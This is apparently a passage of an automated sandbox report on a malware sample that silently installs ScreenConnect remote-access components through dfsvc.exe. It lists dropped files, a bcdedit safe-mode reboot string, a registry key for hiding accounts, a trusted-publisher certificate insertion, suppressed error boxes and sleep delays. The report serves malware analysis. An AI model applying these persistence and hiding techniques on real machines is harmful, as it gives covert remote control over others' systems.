                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1BCA29D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1BCBC550000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: 1A560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599762Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599497Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599053Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598382Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597697Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597473Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597119Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596139Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595809Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595576Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595007Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2223Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe TID: 7116Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599762s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599497s >= -30000sJump to behavior
